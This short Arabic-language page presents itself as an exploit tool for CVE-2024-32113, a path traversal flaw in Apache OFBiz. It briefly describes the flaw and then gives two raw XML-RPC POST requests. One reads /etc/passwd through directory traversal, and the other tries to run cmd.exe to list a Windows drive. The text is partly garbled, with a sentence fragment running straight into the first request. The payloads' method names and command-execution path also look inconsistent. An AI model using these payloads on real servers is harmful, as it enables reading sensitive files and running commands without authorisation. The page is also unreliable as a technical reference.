
أداة استغلال لثغرة CVE-2024-32113 في Apache OFBiz عبر اجتياز المسار من خلال طلبات XML-RPC مُعدّة خصيصًا، مما يتيح قراءة ملفات اعتباطية وإمكانية تنفيذ أوامر على الخوادم المعرضة للخطر.
تم اكتشاف ثغرة أمنية مصنفة على أنها حرجة (Critical) في Apache OFBiz حتى الإصدار 18.12.12. تتأثر بهذه المشكلة وظيفة غير معروفة. يؤدي التلاعب بمدخل غير معروف إلى ثغرة اجتياز المسار (Path Traversal). يستخدم المنتج مدخلات خارجية لإنشاء اسم مسار (Pathname) يهدف إلى تحديد ملف أو دليل يقع تحت دليل أصلي مقيد، لكنه لا يحيد بشكل صحيح العناصر الخاصة داخل اسم المسار التي قد تتسبب في حل اسم المسار إلى موقع خارج الدليل المقيد. تتأثر كل من السرية (Confidentiality) والسلامة (Integrity) والتوفر (Availability).
../../../../../../etc/passwd للإشارة إلى ملف etc/passwd على خادم Apache OFBiz.etc/passwd، الذي يحتوي على معلومات حساسة حول مستخدمي الخادم.POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>performCommand</methodName>
<params>
<param>
<value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
</param>
</params>
</methodCall>
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>example.createBlogPost</methodName>
<params>
<param>
<value><string>../../../../../../etc/passwd</string></value>
</param>
</params>
</methodCall>